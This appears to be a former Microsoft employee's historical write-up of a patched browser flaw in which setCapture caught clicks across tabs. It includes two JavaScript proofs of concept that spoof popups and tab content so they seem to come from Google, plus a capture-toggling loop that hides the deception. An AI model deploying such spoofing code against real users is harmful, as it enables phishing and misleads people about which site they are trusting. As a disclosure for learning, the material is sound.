I was exploring what setCapture could do across tab boundaries and found that it was surprisingly permissive. A page in one tab can capture all mouse clicks — even those made in a completely different tab, or even outside the browser entirely — and react to them by opening popups or redirecting the other tab. This opens up a range of UI deception scenarios.

<span id="sp"></span>
<script language="JavaScript">
// Shared state for the demonstration functions in this script.
// stopCapturing: set to true by a click handler; setRelease() checks it to end
//                the setCapture/releaseCapture loop.
// evilWindow:    the window handle returned by window.open().
var stopCapturing;
var evilWindow;

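/**
 * Historical demonstration, variant 1: a popup that appears to belong to
 * another site. The accompanying write-up states the underlying bug was
 * patched long ago.
 *
 * Steps, in order:
 *  1. Clear stopCapturing and open http://www.google.com in a new window/tab.
 *  2. Install a click handler on the #sp element. When it fires it opens a
 *     300x300 about:blank popup, writes body text and a title into it, and
 *     sets stopCapturing so the capture loop in setRelease() ends.
 *  3. After 500 ms, start the setCapture/releaseCapture loop via setRelease().
 *
 * Reviewer notes:
 *  - Nothing in the popup comes from the site whose name it shows: the
 *    document is about:blank and both title and body are written by the opener.
 *  - Per the write-up, the handler fired for clicks made in another tab while
 *    #sp held mouse capture; that cross-tab delivery was the defect.
 *  - The timer takes a function callback rather than a code string, because a
 *    string argument to setTimeout is an implicit eval.
 */
function PoC1()
{
    stopCapturing = false;
    window.open("http://www.google.com");

    document.getElementById("sp").onclick = function ()
    {
        evilWindow = window.open("about:blank", "", "height=300,width=300");
        evilWindow.document.body.innerHTML = "I am an evil popUp that seems to be opened by Google.";
        evilWindow.document.title = "google.com";
        // Tells setRelease() to release capture and stop rescheduling itself.
        stopCapturing = true;
    };

    setTimeout(function () { setRelease(false); }, 500);
}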

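/**
 * Historical demonstration, variant 2: content that appears to be the result
 * of a navigation inside another site's tab. The accompanying write-up states
 * the underlying bug was patched long ago.
 *
 * Steps, in order:
 *  1. Clear stopCapturing, open http://www.google.com and keep the returned
 *     window handle in evilWindow.
 *  2. Install a click handler on the #sp element. When it fires it sets
 *     stopCapturing, points the opened window at about:blank and, 100 ms
 *     later, writes body text and a title into that window.
 *  3. After 500 ms, start the setCapture/releaseCapture loop via setRelease().
 *
 * Reviewer notes:
 *  - As the injected text itself points out, the address bar shows
 *    about:blank; only the title and page body are spoofed.
 *  - The write to evilWindow.document happens after the opener has navigated
 *    the window to about:blank, not while the other site's document is loaded.
 *  - Timers take function callbacks rather than code strings, because a
 *    string argument to setTimeout is an implicit eval.
 */
function PoC2()
{
    stopCapturing = false;
    evilWindow = window.open("http://www.google.com");

    document.getElementById("sp").onclick = function ()
    {
        // Tells setRelease() to release capture and stop rescheduling itself.
        stopCapturing = true;
        evilWindow.location.href = "about:blank";

        // The write is deferred by 100 ms after the navigation is requested.
        setTimeout(function ()
        {
            evilWindow.document.body.innerHTML = "I am an evil URL that seems to be loaded when clicking on a link of Google.<br />Of course the URL shows about:blank, but did you notice it?";
            evilWindow.document.title = "google.com";
        }, 100);
    };

    setTimeout(function () { setRelease(false); }, 500);
}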

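/**
 * Alternates mouse capture on the #sp element until stopCapturing is set.
 *
 * Each call does one of three things:
 *  - stopCapturing is true: release capture and return without rescheduling.
 *  - captured is true: release capture, then re-acquire after 10 ms.
 *  - captured is false: acquire capture, then release after 200 ms.
 *
 * Per the accompanying write-up, this alternation is what kept the cursor
 * behaviour close to normal while capture was held most of the time.
 * Timers take function callbacks rather than code strings, because a string
 * argument to setTimeout is an implicit eval.
 *
 * @param {boolean} captured - whether #sp is expected to hold capture on entry.
 * @returns {*} the result of releaseCapture() when stopping, otherwise undefined.
 */
function setRelease(captured)
{
    var target = document.getElementById("sp");

    if (stopCapturing) return target.releaseCapture();

    if (captured)
    {
        target.releaseCapture();
        setTimeout(function () { setRelease(false); }, 10);
    }
    else
    {
        target.setCapture();
        setTimeout(function () { setRelease(true); }, 200);
    }
}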
</script>

The first variant opens Google in a new tab and intercepts the next click anywhere in the browser. When the click fires, a popup appears that looks like it came from Google. The second variant takes things further: it redirects the Google tab to about:blank and then injects content, creating the illusion that Google itself navigated away. The alternating setCapture/releaseCapture rhythm keeps the cursor behavior reasonably natural so the deception is less obvious.

I found these issues during my years at Microsoft (2006–2014). They were patched long ago; the code is shared here as a historical record for learning purposes.